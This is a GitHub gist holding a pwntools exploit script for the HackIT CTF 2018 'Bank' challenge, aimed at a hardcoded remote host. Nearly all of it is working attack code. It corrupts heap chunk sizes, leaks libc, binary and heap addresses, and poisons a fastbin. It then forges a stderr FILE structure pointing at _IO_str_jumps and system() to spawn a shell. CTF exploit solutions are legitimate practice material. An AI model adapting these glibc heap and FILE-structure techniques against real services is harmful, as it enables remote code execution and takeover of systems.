Skip to content

Instantly share code, notes, and snippets.

@hama7230

hama7230/exploit.py

Created Sep 10, 2018
Embed
What would you like to do?
HackIT CTF 2018 Bank Reimplemented
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# libc = ELF('')
elf = ELF('./chall2-bank')
context(os='linux', arch=elf.arch)
#context(log_level='debug') # output verbose log
RHOST = "185.168.131.144"
RPORT = 6000
LHOST = "127.0.0.1"
LPORT = 6000
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
gdbscript = """
set environment LD_PRELOAD=./libc-2.24.so
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./chall2-bank'], gdbscript=gdbscript)
else:
#conn = process(['./chall2-bank'])
conn = process(['./chall2-bank'], env={'LD_PRELOAD': './libc-2.24.so'})
if opt == 'a': gdb.attach(conn)
def create(title, stat):
conn.sendlineafter('5. View your bank status', '1')
conn.sendafter(' bank account:', title)
conn.sendlineafter('bank statement:', str(len(stat)+1))
conn.sendline(stat)
conn.recvuntil('index')
def title(idx, title):
conn.sendlineafter('5. View your bank status', '2')
conn.sendlineafter(' bank account:', str(idx))
conn.send(title)
def stat(idx, stat):
conn.sendlineafter('5. View your bank status', '3')
conn.sendlineafter(' bank account:', str(idx))
conn.sendline(stat)
def delete(idx):
conn.sendlineafter('5. View your bank status', '4')
conn.sendlineafter(' bank account:', str(idx))
def show(idx):
conn.sendlineafter('5. View your bank status', '5')
conn.sendlineafter(' bank account:', str(idx))
# exploit
log.info('Pwning')
create('x'*0x8, 'a'*0x1f)
create('x'*0x8, 'a'*0x1f)
delete(0)
create('y'*0x8, 'a'*0x57)
create('y'*0x8, 'a'*0x57)
delete(1)
create('x'*0x8, 'a'*0x2f)
create('x'*0x10+'\xe1', 'a'*0x1f)
delete(0)
create('y'*0x8, 'a'*0x57)
show(2)
conn.recvuntil('Statement: ')
#libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1b58
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x397b58
dbg('libc_base')
create('x'*0x8, 'a'*0x1f)
show(2)
conn.recvuntil('Statement: ')
bin_base = u64(conn.recv(6)+'\x00\x00') - 0x202010
dbg('bin_base')
create('x'*0x8, 'a'*0x1f)
create('x'*0x8, 'a'*0x1f)
delete(5)
create('0'*0x8, 'a'*0x57)
create('1'*0x8, 'a'*0x57)
delete(6)
create('x'*0x8, 'a'*0x2f)
create('x'*0x10+'\xe1', 'a'*0x1f)
delete(5)
create('2'*0x8, 'a'*0x57)
delete(6)
create('3'*0x8, 'a'*0x57)
delete(5)
delete(6)
show(7)
conn.recvuntil('Statement: ')
heap_base = u64(conn.recv(6)+'\x00\x00') - 0x2d0
dbg('heap_base')
create('3'*0x8, 'a'*0x57)
create('3'*0x8, 'a'*0x57)
delete(5)
delete(6)
delete(7)
create('3'*0x8, p64(libc_base+0x3984dd).ljust(0x57, 'x'))
create('3'*0x8, 'a'*0x57)
create('3'*0x8, 'a'*0x50+p64(0xdeadbeef)[:-1])
payload = '\x00'*3 + p64(0)*2 + p64(heap_base+ 0x4f0)
print(hex(len(payload)))
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x5f))
time.sleep(1)
conn.sendline(payload)
create('a', 'd'*0x1f)
fake_stderr = ''
fake_stderr += p64(0) # 0
fake_stderr += p64(0)*3
fake_stderr += p64(0) + p64(0x7fffffffffffffff)
fake_stderr += p64(0)*2
fake_stderr += p64((libc_base + 0x1619be-100)/2) + p64(0) * 0xb
fake_stderr += p64(libc_base + 0x399770)
fake_stderr += p64(0) *3
fake_stderr += p64(0)
fake_stderr += p64(0) * 2
fake_stderr += p64(libc_base +0x394440+0xc0) # _IO_str_jumps
fake_stderr += p64(libc_base + 0x3f480) # system
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x67))
time.sleep(0.1)
conn.sendline(fake_stderr[0:0x60])
delete(10)
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x37))
time.sleep(0.1)
conn.sendline(fake_stderr[0x80:0x80+0x30])
conn.sendline('1')
conn.sendafter(' bank account:', 'xxxxxxx')
conn.sendlineafter('bank statement:', str(0x67))
time.sleep(0.1)
conn.sendline(fake_stderr[0xd0:])
# delete(9)
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.